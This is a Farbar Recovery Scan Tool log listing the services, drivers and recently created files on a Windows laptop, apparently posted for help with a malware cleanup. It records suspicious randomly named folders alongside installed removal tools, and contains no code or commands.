CHR Extension: (Gmail) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-02-08]
CHR Extension: (Chrome Media Router) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-08]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2016-06-10]
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2016-06-10]
==================== Services (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6562472 2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation -> Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation -> Microsoft Corporation)
===================== Drivers (Whitelisted) ======================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [153328 2019-01-08] (Malwarebytes Corporation -> Malwarebytes)
R3 FwLnk; C:\Windows\System32\drivers\FwLnk.sys [17920 2019-02-08] (Microsoft Windows Hardware Compatibility Publisher -> TOSHIBA Corporation)
S3 iaLPSSi_GPIO; C:\Windows\System32\drivers\iaLPSSi_GPIO.sys [38128 2015-06-18] (Intel Corporation - Client Components Group -> Intel Corporation)
S3 iaLPSSi_I2C; C:\Windows\System32\drivers\iaLPSSi_I2C.sys [122608 2015-06-18] (Intel Corporation - Client Components Group -> Intel Corporation)
R3 igfx; C:\Windows\system32\DRIVERS\igdkmd64.sys [10627744 2019-02-08] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [198512 2019-02-09] (Malwarebytes Corporation -> Malwarebytes)
S0 MbamElam; C:\Windows\System32\DRIVERS\MbamElam.sys [20936 2019-02-01] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [127136 2019-02-09] (Malwarebytes Corporation -> Malwarebytes)
R3 MBAMProtection; C:\Windows\system32\DRIVERS\mbam.sys [72864 2019-02-09] (Malwarebytes Corporation -> Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [274416 2019-02-09] (Malwarebytes Corporation -> Malwarebytes)
R3 MBAMWebProtection; C:\Windows\system32\DRIVERS\mwac.sys [114040 2019-02-09] (Malwarebytes Corporation -> Malwarebytes)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-06-18] (Microsoft Windows -> Realtek )
R3 RTL8187B; C:\Windows\System32\drivers\rtl8187B.sys [459336 2015-06-18] (Realtek Semiconductor Corp -> Realtek Semiconductor Corporation )
R3 Thotkey; C:\Windows\System32\drivers\Thotkey.sys [45720 2019-02-08] (TOSHIBA CORPORATION -> Toshiba Corporation)
U3 TrueSight; C:\Windows\System32\drivers\truesight.sys [28272 2019-02-09] (Adlice -> )
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WDC_SAM; C:\Windows\System32\drivers\wdcsam64.sys [35584 2019-02-08] (WDKTestCert wdclab,130885612892544312 -> Western Digital Technologies, Inc.)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Windows -> Microsoft Corporation)
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2019-02-10 15:23 - 2019-02-10 15:23 - 000000000 ____D C:\Users\Thomazing!\Downloads\FRST-OlderVersion
2019-02-10 15:20 - 2019-02-10 15:20 - 000016148 _____ C:\Windows\system32\DESKTOP-OHFLJFD_Thomazing!_HistoryPrediction.bin
2019-02-09 13:22 - 2019-02-09 12:51 - 000875126 _____ C:\Windows\system32\PerfStringBackup.INI
2019-02-09 13:21 - 2019-02-09 13:21 - 000002353 _____ C:\Users\Thomazing!\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2019-02-09 13:21 - 2019-02-09 13:21 - 000000000 ___RD C:\Users\Thomazing!\OneDrive
2019-02-09 13:20 - 2019-02-09 13:20 - 000000000 ____D C:\Windows\CSC
2019-02-09 13:19 - 2019-02-09 13:19 - 000016148 _____ C:\Windows\system32\DESKTOP-OHFLJFD_defaultuser0_HistoryPrediction.bin
2019-02-09 13:19 - 2019-02-09 13:19 - 000000020 ___SH C:\Users\Thomazing!\ntuser.ini
2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Adobe
2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\VirtualStore
2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\TileDataLayer
2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Publishers
2019-02-09 13:19 - 2019-02-08 22:22 - 000000000 ____D C:\Users\Thomazing!
2019-02-09 13:19 - 2019-02-08 21:38 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Packages
2019-02-09 13:15 - 2019-02-09 13:15 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdFs_01_11_00.Wdf
2019-02-09 13:14 - 2019-02-08 23:05 - 000000000 ____D C:\Windows\Panther
2019-02-09 12:55 - 2019-02-09 12:55 - 000000675 _____ C:\Users\Thomazing!\Desktop\malware trojan.txt
2019-02-09 12:49 - 2019-02-09 12:49 - 000072864 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2019-02-09 12:46 - 2019-02-09 12:46 - 000274416 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2019-02-09 12:46 - 2019-02-09 12:46 - 000127136 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2019-02-09 12:46 - 2019-02-09 12:46 - 000114040 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2019-02-09 12:46 - 2019-02-09 12:46 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\PeerDistRepub
2019-02-09 12:44 - 2019-02-09 12:44 - 000002783 _____ C:\Users\Thomazing!\Desktop\AdwCleaner[S00].txt
2019-02-09 12:29 - 2019-02-09 12:46 - 000000000 ____D C:\AdwCleaner
2019-02-09 12:29 - 2019-02-09 12:29 - 007316688 _____ (Malwarebytes) C:\Users\Thomazing!\Downloads\AdwCleaner.exe
2019-02-09 12:29 - 2019-02-09 12:29 - 007316688 _____ (Malwarebytes) C:\Users\Thomazing!\Desktop\AdwCleaner.exe
2019-02-09 12:27 - 2019-02-09 12:27 - 000036161 _____ C:\Users\Thomazing!\Desktop\malwarebytes.txt
2019-02-09 12:06 - 2019-02-09 12:06 - 000198512 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
2019-02-09 12:06 - 2019-02-09 12:06 - 000001912 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-02-09 12:06 - 2019-02-09 12:06 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\mbamtray
2019-02-09 12:06 - 2019-02-09 12:06 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\mbam
2019-02-09 12:06 - 2019-02-09 12:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-02-09 12:06 - 2019-02-01 11:20 - 000020936 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamElam.sys
2019-02-09 12:06 - 2019-01-08 15:32 - 000153328 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2019-02-09 12:05 - 2019-02-09 12:05 - 064476848 _____ (Malwarebytes ) C:\Users\Thomazing!\Downloads\mb3-setup-consumer-3.7.1.2839-1.0.538-1.0.9172 (1).exe
2019-02-09 12:05 - 2019-02-09 12:05 - 064476848 _____ (Malwarebytes ) C:\Users\Thomazing!\Desktop\mb3-setup-consumer-3.7.1.2839-1.0.538-1.0.9172 (1).exe
2019-02-09 10:14 - 2019-02-09 10:14 - 000056671 _____ C:\Users\Thomazing!\Downloads\6971471.pdf
2019-02-09 09:07 - 2019-02-09 09:07 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\NetworkTiles
2019-02-09 08:20 - 2019-02-09 12:05 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-02-09 08:20 - 2019-02-09 12:05 - 000000000 ____D C:\Program Files\Malwarebytes
2019-02-09 08:16 - 2019-02-09 08:19 - 064476848 _____ (Malwarebytes ) C:\Users\Thomazing!\Downloads\mb3-setup-consumer-3.7.1.2839-1.0.538-1.0.9172.exe
2019-02-09 08:15 - 2019-02-09 08:15 - 000019920 _____ C:\Users\Thomazing!\Desktop\Delete report.txt
2019-02-09 08:14 - 2019-02-09 08:14 - 000002354 _____ C:\Users\Thomazing!\Desktop\Report2.txt
2019-02-09 08:14 - 2019-02-09 08:14 - 000002354 _____ C:\Users\Thomazing!\Desktop\Report1.txt
2019-02-09 07:31 - 2019-02-09 07:31 - 000000899 _____ C:\Users\Public\Desktop\RogueKiller.lnk
2019-02-09 07:30 - 2019-02-09 12:23 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\m1dfk02frcw
2019-02-09 07:20 - 2019-02-09 07:32 - 000028272 _____ C:\Windows\system32\Drivers\truesight.sys
2019-02-09 07:19 - 2019-02-09 07:19 - 000000000 ____D C:\ProgramData\RogueKiller
2019-02-09 07:18 - 2019-02-09 07:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
2019-02-09 07:18 - 2019-02-09 07:31 - 000000000 ____D C:\Program Files\RogueKiller
2019-02-09 07:17 - 2019-02-09 07:17 - 029333240 _____ (Adlice Software ) C:\Users\Thomazing!\Desktop\RogueKiller_setup_ref3.exe
2019-02-09 07:16 - 2019-02-09 07:17 - 029333240 _____ (Adlice Software ) C:\Users\Thomazing!\Downloads\RogueKiller_setup_ref3.exe
2019-02-09 06:59 - 2019-02-09 07:48 - 000000000 ____D C:\Program Files\9AH8B0L5IJ
2019-02-09 06:59 - 2019-02-09 07:04 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\dnrpypyqja1
2019-02-09 01:03 - 2019-02-09 01:03 - 000023657 _____ C:\Users\Thomazing!\Downloads\Addition.txt
2019-02-09 00:59 - 2019-02-10 15:25 - 000015224 _____ C:\Users\Thomazing!\Downloads\FRST.txt
2019-02-09 00:59 - 2019-02-10 15:24 - 000000000 ____D C:\FRST
2019-02-09 00:58 - 2019-02-10 15:23 - 002434048 _____ (Farbar) C:\Users\Thomazing!\Downloads\FRST64.exe
2019-02-09 00:43 - 2019-02-09 12:23 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\mo24n4005vt
2019-02-09 00:30 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\wlzey0ugdb2
2019-02-08 23:57 - 2019-02-08 23:57 - 000000000 ____D C:\ProgramData\TechSmith
2019-02-08 23:56 - 2019-02-08 23:58 - 000000000 ____D C:\Users\Thomazing!\Documents\Snagit
2019-02-08 23:56 - 2019-02-08 23:56 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\TechSmith
2019-02-08 23:55 - 2019-02-08 23:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Snagit12
2019-02-08 23:55 - 2019-02-08 23:55 - 000000000 ____D C:\Program Files (x86)\Snagit12
2019-02-08 23:10 - 2019-02-08 23:10 - 000000000 ____D C:\ProgramData\SecuritySuite
2019-02-08 23:02 - 2019-02-09 09:36 - 000004210 _____ C:\Windows\System32\Tasks\CCleaner Update
2019-02-08 23:02 - 2019-02-09 00:30 - 000000000 ____D C:\Program Files\CCleaner
2019-02-08 23:02 - 2019-02-08 23:02 - 000002898 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
2019-02-08 23:02 - 2019-02-08 23:02 - 000002377 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-02-08 23:02 - 2019-02-08 23:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2019-02-08 23:01 - 2019-02-08 23:01 - 000000000 ____D C:\Program Files\Google
2019-02-08 23:00 - 2019-02-08 23:07 - 000003418 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2019-02-08 23:00 - 2019-02-08 23:07 - 000003294 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2019-02-08 23:00 - 2019-02-08 23:01 - 000000000 ____D C:\ProgramData\Google
2019-02-08 22:58 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\b2mkkcpioce
2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files\Reference Assemblies
2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files\MSBuild
2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files (x86)\Reference Assemblies
2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files (x86)\MSBuild
2019-02-08 22:55 - 2015-06-17 18:10 - 001166520 _____ (Microsoft Corporation) C:\Windows\system32\PresentationNative_v0300.dll
2019-02-08 22:55 - 2015-06-17 18:10 - 000124112 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll
2019-02-08 22:55 - 2015-06-17 18:10 - 000035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
2019-02-08 22:55 - 2015-05-29 21:07 - 000778936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationNative_v0300.dll
2019-02-08 22:55 - 2015-05-29 21:07 - 000102608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2019-02-08 22:55 - 2015-05-29 21:07 - 000035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe
2019-02-08 22:46 - 2019-02-08 22:46 - 000000836 __RSH C:\ProgramData\ntuser.pol
2019-02-08 22:28 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\fsmysd5hgd4
2019-02-08 22:22 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\htpaossc1dy
2019-02-08 22:22 - 2019-02-08 22:22 - 006161408 _____ C:\Users\Thomazing!\AppData\Local\dump007.dat
2019-02-08 22:22 - 2019-02-08 22:22 - 000000009 _____ C:\Users\Thomazing!\rstr3.ini
2019-02-08 22:11 - 2019-02-09 07:48 - 000000004 _____ C:\ProgramData\lock.dat
2019-02-08 22:11 - 2019-02-09 07:30 - 000000036 _____ C:\ProgramData\irw.atsd
2019-02-08 22:11 - 2019-02-08 22:11 - 000000008 _____ C:\ProgramData\ts.dat
2019-02-08 22:08 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\dwdqael1vpm
2019-02-08 22:03 - 2019-02-10 15:21 - 000004178 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{166847B2-00F9-4170-B86A-AB179FF4BAF1}
2019-02-08 22:03 - 2019-02-08 22:03 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Macromedia
2019-02-08 22:00 - 2019-02-08 22:00 - 000003584 _____ C:\Windows\SECOH-QAD.dll
2019-02-08 21:58 - 2019-02-09 10:34 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\DMCache
2019-02-08 21:58 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\p542dcem2lr
2019-02-08 21:58 - 2019-02-08 23:05 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\IDM
2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\Users\Thomazing!\Downloads\Video
2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\Users\Thomazing!\Downloads\Compressed
2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\ProgramData\IDM
2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\Program Files (x86)\Internet Download Manager
2019-02-08 21:50 - 2019-02-08 21:50 - 001612288 _____ C:\Windows\bxetfbicyncsflqei.bxetf
2019-02-08 21:49 - 2019-02-08 23:06 - 000000000 ____D C:\ProgramData\boost_interprocess
2019-02-08 21:49 - 2019-02-08 21:52 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Opera Software
2019-02-08 21:48 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\la5jchefohd
2019-02-08 21:47 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\znnxx0e21dn
2019-02-08 21:47 - 2019-02-08 21:47 - 000000003 _____ C:\Users\Thomazing!\AppData\Local\wbem.ini
2019-02-08 21:47 - 2019-02-08 21:47 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Mozilla
2019-02-08 21:46 - 2019-02-09 00:39 - 000000000 ____D C:\Program Files (x86)\Cta
2019-02-08 21:46 - 2019-02-08 21:48 - 008019296 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2019-02-08 21:46 - 2019-02-08 21:48 - 001123400 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2019-02-08 21:46 - 2019-02-08 21:46 - 000621928 _____ (VxDriver) C:\Windows\B62CD2D3FFB1.sys
2019-02-08 21:46 - 2019-02-08 21:46 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Opera Software
2019-02-08 21:45 - 2019-02-08 23:05 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\uTorrent
2019-02-08 21:45 - 2019-02-08 21:45 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
2019-02-08 21:45 - 2019-02-08 21:45 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
2019-02-08 21:45 - 2019-02-08 21:45 - 000140800 _____ C:\Users\Thomazing!\AppData\Local\installer.dat
2019-02-08 21:45 - 2019-02-08 21:45 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
2019-02-08 21:45 - 2019-02-08 21:45 - 000083784 _____ (Microsoft Corporation) C:\ProgramData\vcruntime140.dll
2019-02-08 21:45 - 2019-02-08 21:45 - 000053888 _____ (TOSHIBA Corporation) C:\Windows\system32\Drivers\TVALZ_O.SYS
2019-02-08 21:45 - 2019-02-08 21:45 - 000045720 _____ (Toshiba Corporation) C:\Windows\system32\Drivers\Thotkey.sys
2019-02-08 21:45 - 2019-02-08 21:45 - 000044208 _____ (TOSHIBA Corporation) C:\Windows\system32\Drivers\tosrfec.sys
2019-02-08 21:45 - 2019-02-08 21:45 - 000035584 _____ (Western Digital Technologies, Inc.) C:\Windows\system32\Drivers\wdcsam64.sys
2019-02-08 21:45 - 2019-02-08 21:45 - 000017920 _____ (TOSHIBA Corporation) C:\Windows\system32\Drivers\FwLnk.sys
2019-02-08 21:45 - 2019-02-08 21:45 - 000003088 _____ C:\Windows\System32\Tasks\Synaptics TouchPad Enhancements
2019-02-08 21:45 - 2019-02-08 21:45 - 000000881 _____ C:\Users\Thomazing!\AppData\Roaming\Microsoft\Windows\Start Menu\µTorrent.lnk
2019-02-08 21:45 - 2019-02-08 21:45 - 000000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_SynTP_01011.Wdf
2019-02-08 21:45 - 2019-02-08 21:45 - 000000000 ____D C:\Program Files\Synaptics
2019-02-08 21:44 - 2019-02-08 21:45 - 000000000 ____D C:\ProgramData\VMR6PC5JA6GYC9V0XH3B
2019-02-08 21:44 - 2019-02-08 21:44 - 001795952 _____ (Microsoft Corporation) C:\Windows\system32\WdfCoInstaller01011.dll
2019-02-08 21:44 - 2019-02-08 21:44 - 000722672 _____ (Synaptics Incorporated) C:\Windows\system32\SynCOM.dll
2019-02-08 21:44 - 2019-02-08 21:44 - 000528112 _____ (Synaptics Incorporated) C:\Windows\system32\Drivers\SynTP.sys
2019-02-08 21:44 - 2019-02-08 21:44 - 000422128 _____ (Synaptics Incorporated) C:\Windows\system32\SynTPCo19.dll
2019-02-08 21:44 - 2019-02-08 21:44 - 000400112 _____ (Synaptics Incorporated) C:\Windows\SysWOW64\SynCom.dll
2019-02-08 21:44 - 2019-02-08 21:44 - 000251632 _____ (Synaptics Incorporated) C:\Windows\system32\SynTPAPI.dll
2019-02-08 21:44 - 2019-02-08 21:44 - 000169712 _____ (Synaptics Incorporated) C:\Windows\SysWOW64\SynTPCom.dll
2019-02-08 21:42 - 2019-02-08 21:42 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\WinRAR
2019-02-08 21:42 - 2019-02-08 21:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2019-02-08 21:41 - 2019-02-08 21:41 - 003141232 _____ (Alexander Roshal) C:\Users\Thomazing!\Downloads\winrar-x64-57b1.exe
2019-02-08 21:41 - 2019-02-08 21:41 - 000000000 ____D C:\Program Files\WinRAR
2019-02-08 21:41 - 2019-02-08 21:41 - 000000000 ____D C:\Program Files\VideoLAN
2019-02-08 21:37 - 2019-02-08 21:37 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2019-02-08 21:35 - 2019-02-08 21:35 - 010627744 _____ (Intel Corporation) C:\Windows\system32\Drivers\igdkmd64.sys
2019-02-08 21:35 - 2019-02-08 21:35 - 006593816 _____ (Intel Corporation) C:\Windows\system32\igdumd64.dll
2019-02-08 21:35 - 2019-02-08 21:35 - 004931384 _____ (Intel Corporation) C:\Windows\SysWOW64\igdumd32.dll
2019-02-08 21:35 - 2019-02-08 21:35 - 004755784 _____ (Intel Corporation) C:\Windows\system32\igd10umd64.dll
2019-02-08 21:35 - 2019-02-08 21:35 - 004370016 _____ (Intel Corporation) C:\Windows\SysWOW64\igd10umd32.dll
2019-02-08 21:35 - 2019-02-08 21:35 - 001991936 _____ C:\Windows\system32\iglhxa64.cpa
2019-02-08 21:35 - 2019-02-08 21:35 - 000982240 _____ C:\Windows\SysWOW64\igkrng500.bin
2019-02-08 21:35 - 2019-02-08 21:35 - 000982240 _____ C:\Windows\system32\igkrng500.bin
2019-02-08 21:35 - 2019-02-08 21:35 - 000439308 _____ C:\Windows\SysWOW64\igcompkrng500.bin
2019-02-08 21:35 - 2019-02-08 21:35 - 000439308 _____ C:\Windows\system32\igcompkrng500.bin
2019-02-08 21:35 - 2019-02-08 21:35 - 000208896 _____ (Intel Corporation) C:\Windows\SysWOW64\iglhsip32.dll
2019-02-08 21:35 - 2019-02-08 21:35 - 000206336 _____ (Intel Corporation) C:\Windows\system32\iglhsip64.dll
2019-02-08 21:35 - 2019-02-08 21:35 - 000188416 _____ (Intel Corporation) C:\Windows\system32\iglhcp64.dll
2019-02-08 21:35 - 2019-02-08 21:35 - 000147456 _____ (Intel Corporation) C:\Windows\SysWOW64\iglhcp32.dll
2019-02-08 21:35 - 2019-02-08 21:35 - 000092356 _____ C:\Windows\SysWOW64\igfcg500m.bin
2019-02-08 21:35 - 2019-02-08 21:35 - 000092356 _____ C:\Windows\system32\igfcg500m.bin
2019-02-08 21:35 - 2019-02-08 21:35 - 000060254 _____ C:\Windows\system32\iglhxg64.vp
2019-02-08 21:35 - 2019-02-08 21:35 - 000060226 _____ C:\Windows\system32\iglhxc64.vp
2019-02-08 21:35 - 2019-02-08 21:35 - 000060015 _____ C:\Windows\system32\iglhxo64.vp
2019-02-08 21:35 - 2019-02-08 21:35 - 000005424 _____ C:\Windows\system32\iglhxs64.vp
2019-02-08 21:35 - 2019-02-08 21:35 - 000001090 _____ C:\Windows\system32\iglhxa64.vp
2019-02-08 21:35 - 2019-02-08 21:35 - 000000000 ____D C:\Windows\PCHEALTH
2019-02-08 21:34 - 2019-02-08 21:34 - 000000000 ____D C:\Windows\System32\Tasks\OfficeSoftwareProtectionPlatform
2019-02-08 21:33 - 2019-02-08 21:45 - 000000000 ____D C:\Program Files\Microsoft Office
2019-02-08 21:33 - 2019-02-08 21:35 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2019-02-08 21:33 - 2019-02-08 21:33 - 000000000 __RHD C:\MSOCache
2019-02-08 21:33 - 2019-02-08 21:33 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Microsoft Help
2019-02-08 21:33 - 2019-02-08 21:33 - 000000000 ____D C:\Program Files (x86)\Microsoft Analysis Services
2019-02-08 21:26 - 2019-02-08 23:17 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Google
2019-02-08 21:26 - 2019-02-08 23:02 - 000000000 ____D C:\Program Files (x86)\Google
2019-02-08 21:26 - 2019-02-08 21:26 - 001136176 _____ (Google Inc.) C:\Users\Thomazing!\Downloads\ChromeSetup.exe
2019-02-08 21:24 - 2019-02-08 21:24 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\MicrosoftEdge
2019-02-07 17:10 - 2019-02-07 17:10 - 000098203 _____ C:\Windows\uninstaller.dat
==================== One month (modified) ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2019-02-09 13:19 - 2015-07-31 06:42 - 000000000 ____D C:\Windows\rescache
2019-02-09 13:16 - 2015-07-10 17:47 - 000000000 ____D C:\Windows\system32\Sysprep
2019-02-09 13:14 - 2015-07-31 06:42 - 000028672 _____ C:\Windows\system32\config\BCD-Template
2019-02-09 12:51 - 2015-07-31 06:40 - 000000000 ____D C:\Windows\INF
2019-02-09 12:46 - 2015-07-31 05:52 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-02-09 12:46 - 2015-07-10 17:05 - 000131072 ___SH C:\Windows\system32\config\BBI
2019-02-09 12:06 - 2015-07-31 06:42 - 000000000 ___HD C:\Windows\ELAMBKUP
2019-02-09 07:01 - 2015-07-31 06:42 - 000000000 ____D C:\Windows\appcompat
2019-02-08 23:59 - 2015-09-10 13:44 - 000000000 __RHD C:\Users\Public\AccountPictures
2019-02-08 22:56 - 2015-07-31 06:25 - 000000000 ____D C:\Windows\CbsTemp
2019-02-08 22:45 - 2015-07-31 06:42 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2019-02-08 22:08 - 2015-07-31 05:49 - 000277768 _____ C:\Windows\system32\FNTCACHE.DAT
2019-02-08 21:46 - 2015-07-31 06:42 - 000000000 ____D C:\Windows\AppReadiness
2019-02-08 21:39 - 2015-07-31 06:42 - 000000000 ___HD C:\Program Files\WindowsApps
2019-02-08 21:34 - 2015-07-31 06:42 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2019-02-08 21:33 - 2015-09-10 13:21 - 000000000 ____D C:\Windows\ShellNew
==================== Files in the root of some directories =======
2019-02-08 22:11 - 2019-02-09 07:48 - 000000004 _____ () C:\ProgramData\lock.dat
2019-02-08 21:45 - 2019-02-08 21:45 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
2019-02-08 21:45 - 2019-02-08 21:45 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
2019-02-08 21:45 - 2019-02-08 21:45 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
2019-02-08 22:11 - 2019-02-08 22:11 - 000000008 _____ () C:\ProgramData\ts.dat
2019-02-08 21:45 - 2019-02-08 21:45 - 000083784 _____ (Microsoft Corporation) C:\ProgramData\vcruntime140.dll
1601-01-03 21:26 - 1601-01-03 21:26 - 000058368 ____N (Microsoft Corporation) C:\Program Files (x86)\iUOI.exe
1601-01-03 21:26 - 1601-01-03 21:26 - 000180736 ____N (Microsoft Corporation) C:\Program Files (x86)\OKseaoP.exe
2019-02-08 22:22 - 2019-02-08 22:22 - 006161408 _____ () C:\Users\Thomazing!\AppData\Local\dump007.dat
2019-02-08 21:45 - 2019-02-08 21:45 - 000140800 _____ () C:\Users\Thomazing!\AppData\Local\installer.dat
1601-01-03 21:26 - 1601-01-03 21:26 - 000058368 ____N (Microsoft Corporation) C:\Users\Thomazing!\AppData\Local\IOIiIOa.exe
2019-02-08 21:47 - 2019-02-08 21:47 - 000000003 _____ () C:\Users\Thomazing!\AppData\Local\wbem.ini
Some files in TEMP:
====================
2019-02-08 21:46 - 2019-02-08 21:46 - 001527488 _____ (Microsoft Corporation) C:\Users\Thomazing!\AppData\Local\Temp\dbghelp.dll
2019-02-08 21:44 - 2019-02-08 21:47 - 025260414 _____ (TigerTrade ) C:\Users\Thomazing!\AppData\Local\Temp\ezdyyd.exe
